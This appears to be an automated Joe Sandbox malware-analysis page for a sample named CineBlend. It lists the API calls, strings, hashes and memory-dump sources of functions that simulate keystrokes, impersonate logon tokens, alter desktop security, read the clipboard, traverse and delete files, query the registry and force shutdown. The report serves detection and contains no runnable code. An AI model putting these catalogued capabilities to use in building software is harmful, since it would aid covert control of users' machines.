Opcode Fuzzy Hash: eed4dd1f3d8a24abfe731e69a0c1df89cc4f0473daf66a115af33e53d4dd4f49
Instruction Fuzzy Hash: 0ED06C3200010DBBDF028F85DD06EDA3BAAFB4C714F014010BE1866020C732E821AB90

Non-executed Functions

Function 00B4FC7C Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00B4FC86
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B8FCB8
IsIconic.USER32(00000000), ref: 00B8FCC1
ShowWindow.USER32(00000000,00000009), ref: 00B8FCCE
SetForegroundWindow.USER32(00000000), ref: 00B8FCD8
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B8FCEE
GetCurrentThreadId.KERNEL32 ref: 00B8FCF5
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B8FD01
AttachThreadInput.USER32(?,00000000,00000001), ref: 00B8FD12
AttachThreadInput.USER32(?,00000000,00000001), ref: 00B8FD1A
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00B8FD22
SetForegroundWindow.USER32(00000000), ref: 00B8FD25
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8FD3A
keybd_event.USER32(00000012,00000000), ref: 00B8FD45
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8FD4F
keybd_event.USER32(00000012,00000000), ref: 00B8FD54
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8FD5D
keybd_event.USER32(00000012,00000000), ref: 00B8FD62
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8FD6C
keybd_event.USER32(00000012,00000000), ref: 00B8FD71
SetForegroundWindow.USER32(00000000), ref: 00B8FD74
AttachThreadInput.USER32(?,000000FF,00000000), ref: 00B8FD9B

Strings

Shell_TrayWnd, xrefs: 00B8FCB3

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: adcc9db88b765d7696c12d6aafcc721164fac29fbb4d938c46f9d9b684a80e12
Instruction ID: 58d26dfa4ced1b47b77fff9eb86f7d640c39de4078b2a771434f5827bf67b12f
Opcode Fuzzy Hash: adcc9db88b765d7696c12d6aafcc721164fac29fbb4d938c46f9d9b684a80e12
Instruction Fuzzy Hash: A9316375A40218BBEB206BB54C49F7F7EACEB48B50F100079FA01E71E1DAB05D10EBA0

Function 00B91B4D Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00B92010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B9205A
Part of subcall function 00B92010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B92087
Part of subcall function 00B92010: GetLastError.KERNEL32 ref: 00B92097

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00B91BD2
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00B91BF4
CloseHandle.KERNEL32(?), ref: 00B91C05
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B91C1D
GetProcessWindowStation.USER32 ref: 00B91C36
SetProcessWindowStation.USER32(00000000), ref: 00B91C40
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B91C5C

Part of subcall function 00B91A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B91B48), ref: 00B91A20
Part of subcall function 00B91A0B: CloseHandle.KERNEL32(?,?,00B91B48), ref: 00B91A35

Strings

default, xrefs: 00B91C57
, xrefs: 00B91BA6
winsta0, xrefs: 00B91C18

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: ccbe25ddd1156c1515da6a1368a7764abe11f8e931c7d9322327d9a9e30235cb
Instruction ID: 9b44c41455d2a60232c6a0972c9565f8c138109f3b2ce53079bdecf9c808c42b
Opcode Fuzzy Hash: ccbe25ddd1156c1515da6a1368a7764abe11f8e931c7d9322327d9a9e30235cb
Instruction Fuzzy Hash: AF818B75A0120AAFDF119FA8DC49FEE7BF8EF08304F1444B9F914A62A1DB718945DB60

Function 00B914AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B91A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B91A60
Part of subcall function 00B91A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B914E7,?,?,?), ref: 00B91A6C
Part of subcall function 00B91A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B914E7,?,?,?), ref: 00B91A7B
Part of subcall function 00B91A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B914E7,?,?,?), ref: 00B91A82
Part of subcall function 00B91A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B91A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B91518
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B9154C
GetLengthSid.ADVAPI32(?), ref: 00B91563
GetAce.ADVAPI32(?,00000000,?), ref: 00B9159D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B915B9
GetLengthSid.ADVAPI32(?), ref: 00B915D0
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B915D8
HeapAlloc.KERNEL32(00000000), ref: 00B915DF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B91600
CopySid.ADVAPI32(00000000), ref: 00B91607
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B91636
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B91658
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B9166A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B91691
HeapFree.KERNEL32(00000000), ref: 00B91698
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B916A1
HeapFree.KERNEL32(00000000), ref: 00B916A8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B916B1
HeapFree.KERNEL32(00000000), ref: 00B916B8
GetProcessHeap.KERNEL32(00000000,?), ref: 00B916C4
HeapFree.KERNEL32(00000000), ref: 00B916CB

Part of subcall function 00B91ADF: GetProcessHeap.KERNEL32(00000008,00B914FD,?,00000000,?,00B914FD,?), ref: 00B91AED
Part of subcall function 00B91ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B914FD,?), ref: 00B91AF4
Part of subcall function 00B91ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B914FD,?), ref: 00B91B03

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 13272952d98108355d9a8eeeb1d6c5394869c5db933c8bb9b15eb70f520187a0
Instruction ID: fdc902d6d9114d037e914b05fac382c0df523becbe1ac632e61772834e0eb318
Opcode Fuzzy Hash: 13272952d98108355d9a8eeeb1d6c5394869c5db933c8bb9b15eb70f520187a0
Instruction Fuzzy Hash: AD714EB690020AABDF10DFA9DC44FAEBBB8FF08350F194965E915E71A0DB319905DB60

Function 00BAF55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00BCDCD0), ref: 00BAF586
IsClipboardFormatAvailable.USER32(0000000D), ref: 00BAF594
GetClipboardData.USER32(0000000D), ref: 00BAF5A0
CloseClipboard.USER32 ref: 00BAF5AC
GlobalLock.KERNEL32(00000000), ref: 00BAF5E4
CloseClipboard.USER32 ref: 00BAF5EE
GlobalUnlock.KERNEL32(00000000), ref: 00BAF619
IsClipboardFormatAvailable.USER32(00000001), ref: 00BAF626
GetClipboardData.USER32(00000001), ref: 00BAF62E
GlobalLock.KERNEL32(00000000), ref: 00BAF63F
GlobalUnlock.KERNEL32(00000000), ref: 00BAF67F
IsClipboardFormatAvailable.USER32(0000000F), ref: 00BAF695
GetClipboardData.USER32(0000000F), ref: 00BAF6A1
GlobalLock.KERNEL32(00000000), ref: 00BAF6B2
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00BAF6D4
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00BAF6F1
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00BAF72F
GlobalUnlock.KERNEL32(00000000), ref: 00BAF750
CountClipboardFormats.USER32 ref: 00BAF771
CloseClipboard.USER32 ref: 00BAF7B6

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 3d935e953fb11a64af5d3da9ba730936138b10a8a78322602103821dcd419d8b
Instruction ID: 1e1a36d37c252beaa7995e868bc59b421b1102590fa0a41230fb5a5e0cf07711
Opcode Fuzzy Hash: 3d935e953fb11a64af5d3da9ba730936138b10a8a78322602103821dcd419d8b
Instruction Fuzzy Hash: F4615A39208202AFD310EF64D885EBAB7E4EF89744F1445B9F546872A2DF31DD45CB62

Function 00BA73D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00BA7403
FindClose.KERNEL32(00000000), ref: 00BA7457
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BA7493
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BA74BA

Part of subcall function 00B3B329: _wcslen.LIBCMT ref: 00B3B333

FileTimeToSystemTime.KERNEL32(?,?), ref: 00BA74F7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00BA7524

Strings

%03d, xrefs: 00BA77E7
%4d, xrefs: 00BA75F6
%02d, xrefs: 00BA7645, 00BA764F, 00BA769F, 00BA76EF, 00BA773F, 00BA778F
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00BA7577
%4d%02d%02d%02d%02d%02d, xrefs: 00BA75AF

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 48a9dca1c526330d201ea82e1e46224e0d88963fcffe3eba3f8417199d48f186
Instruction ID: 8f54ee7ed1ffbc0ff1bff5733c68d347e1ec0e443cc66578d32ea2f0505dc3cf
Opcode Fuzzy Hash: 48a9dca1c526330d201ea82e1e46224e0d88963fcffe3eba3f8417199d48f186
Instruction Fuzzy Hash: 5ED14F72508344AEC310EBA4C885EBBB7ECEF89704F44499DF585D7292EB74DA44C762

Function 00BAA087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00BAA0A8
GetFileAttributesW.KERNEL32(?), ref: 00BAA0E6
SetFileAttributesW.KERNEL32(?,?), ref: 00BAA100
FindNextFileW.KERNEL32(00000000,?), ref: 00BAA118
FindClose.KERNEL32(00000000), ref: 00BAA123
FindFirstFileW.KERNEL32(*.*,?), ref: 00BAA13F
SetCurrentDirectoryW.KERNEL32(?), ref: 00BAA18F
SetCurrentDirectoryW.KERNEL32(00BF7B94), ref: 00BAA1AD
FindNextFileW.KERNEL32(00000000,00000010), ref: 00BAA1B7
FindClose.KERNEL32(00000000), ref: 00BAA1C4
FindClose.KERNEL32(00000000), ref: 00BAA1D4

Strings

*.*, xrefs: 00BAA13A

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: a1ce4e488ab22cbe75c7e7f2acb272199d952ca411120acd6e78ed09ee714e25
Instruction ID: 82f10ef1e51f3273e2acdbbba59dac4c1e123d4f9b828493fb2359ff083cc132
Opcode Fuzzy Hash: a1ce4e488ab22cbe75c7e7f2acb272199d952ca411120acd6e78ed09ee714e25
Instruction Fuzzy Hash: 5731C2356042197BDB20AFA4DC49EDE77ECDF4B361F1004E5E815E30A0EB70DA85CA65

Function 00BA4763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BA4785
_wcslen.LIBCMT ref: 00BA47B2
CreateDirectoryW.KERNEL32(?,00000000), ref: 00BA47E2
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00BA4803
RemoveDirectoryW.KERNEL32(?), ref: 00BA4813
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00BA489A
CloseHandle.KERNEL32(00000000), ref: 00BA48A5
CloseHandle.KERNEL32(00000000), ref: 00BA48B0

Strings

:, xrefs: 00BA47C7
\, xrefs: 00BA47BC
\??\%s, xrefs: 00BA47A0

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: ffa3eac1acd521c878be20e9bf854af3a5587801a535321453c69d8a5dbf7362
Instruction ID: dc6e834e58285b9d08abd9e83cb8f98e3cf1b04609573323de67585f534f032b
Opcode Fuzzy Hash: ffa3eac1acd521c878be20e9bf854af3a5587801a535321453c69d8a5dbf7362
Instruction Fuzzy Hash: EA31B2B5504249ABDB219FA4DC49FEB37FCEF8A701F1041F6F609D6060EBB496458B24

Function 00BAA1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00BAA203
FindNextFileW.KERNEL32(00000000,?), ref: 00BAA25E
FindClose.KERNEL32(00000000), ref: 00BAA269
FindFirstFileW.KERNEL32(*.*,?), ref: 00BAA285
SetCurrentDirectoryW.KERNEL32(?), ref: 00BAA2D5
SetCurrentDirectoryW.KERNEL32(00BF7B94), ref: 00BAA2F3
FindNextFileW.KERNEL32(00000000,00000010), ref: 00BAA2FD
FindClose.KERNEL32(00000000), ref: 00BAA30A
FindClose.KERNEL32(00000000), ref: 00BAA31A

Part of subcall function 00B9E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B9E3B4

Strings

*.*, xrefs: 00BAA280

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: dcb2aed5258db94aa15e488b279a6f017469284d86d75dba0664fc739484bbc9
Instruction ID: 997208314df1116b63d3820bf98730a9bfe799ba355be4b7c392eb47cb951018
Opcode Fuzzy Hash: dcb2aed5258db94aa15e488b279a6f017469284d86d75dba0664fc739484bbc9
Instruction Fuzzy Hash: 8531E37550421D6ACF20AFA4EC49FEE77ECDF4A325F1041E5E810A30A0DB31DE99CA65

Function 00BBC8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BBD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BBC10E,?,?), ref: 00BBD415
Part of subcall function 00BBD3F8: _wcslen.LIBCMT ref: 00BBD451
Part of subcall function 00BBD3F8: _wcslen.LIBCMT ref: 00BBD4C8
Part of subcall function 00BBD3F8: _wcslen.LIBCMT ref: 00BBD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BBC99E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00BBCA09
RegCloseKey.ADVAPI32(00000000), ref: 00BBCA2D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00BBCA8C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00BBCB47
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00BBCBB4
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00BBCC49
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00BBCC9A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00BBCD43
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BBCDE2
RegCloseKey.ADVAPI32(00000000), ref: 00BBCDEF

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: a27d2690aaaec1f6845ac7366317d09fc02ea38d31e7ffca4d7c00a45155b447
Instruction ID: 53731c83ab478e7552997fee295d2d3cd49fd7ae9845ab9d1ddb549c63dddb6d
Opcode Fuzzy Hash: a27d2690aaaec1f6845ac7366317d09fc02ea38d31e7ffca4d7c00a45155b447
Instruction Fuzzy Hash: 73026F75604200AFD715DF28C895E7ABBE5EF48304F1884ADF849CB2A2DB71ED46CB91

Function 00B9D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B35851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B355D1,?,?,00B74B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00B35871

Part of subcall function 00B9EAB0: GetFileAttributesW.KERNEL32(?,00B9D840), ref: 00B9EAB1

FindFirstFileW.KERNEL32(?,?), ref: 00B9D9CD
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00B9DA88
MoveFileW.KERNEL32(?,?), ref: 00B9DA9B
DeleteFileW.KERNEL32(?,?,?,?), ref: 00B9DAB8
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B9DAE2

Part of subcall function 00B9DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00B9DAC7,?,?), ref: 00B9DB5D

FindClose.KERNEL32(00000000,?,?,?), ref: 00B9DAFE
FindClose.KERNEL32(00000000), ref: 00B9DB0F

Strings

\*.*, xrefs: 00B9D978, 00B9D981, 00B9D996

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: ada81561a4fcca4a68900575870c976b988d1506539d1cfae056ae7b2c41f33e
Instruction ID: 450d2b5bdfd5fdb05e84fe00709baebaa2921325511ee38ff5380a876888b2b6
Opcode Fuzzy Hash: ada81561a4fcca4a68900575870c976b988d1506539d1cfae056ae7b2c41f33e
Instruction Fuzzy Hash: C4612735801109AACF15EFA1DA92DEDB7F5AF15300F2441F9E502B71A6EB31AF09CB60

Function 00BAF7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00BAF7EE
EmptyClipboard.USER32 ref: 00BAF7F4
GlobalAlloc.KERNEL32(00000002,?), ref: 00BAF809
CloseClipboard.USER32 ref: 00BAF900

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 6ca0c8376324e4116ecac7650d6ecdaeb499d3435b3ec0385e06d12cee99e4c3
Instruction ID: 71562185d125c7138844ef5b23a48fddf4e543795525d0d5e1232814ca37a924
Opcode Fuzzy Hash: 6ca0c8376324e4116ecac7650d6ecdaeb499d3435b3ec0385e06d12cee99e4c3
Instruction Fuzzy Hash: 80418D35608612EFD310CF55D888F69BBE4EF49318F14C4A9E8598F662CB35ED41CB90

Function 00B9F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00B92010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B9205A
Part of subcall function 00B92010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B92087
Part of subcall function 00B92010: GetLastError.KERNEL32 ref: 00B92097

ExitWindowsEx.USER32(?,00000000), ref: 00B9F249

Strings

SeShutdownPrivilege, xrefs: 00B9F219
, xrefs: 00B9F237
@, xrefs: 00B9F23C
, xrefs: 00B9F273

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 1442a49103b045d506c8fc85f6046082a5ef04ce9c5dcba02d052e6eeea0f55d
Instruction ID: 7109923837ae918a6b145d7d8424d0b43ff0ba40d9d20a3f7df4b8c8ba75a90e
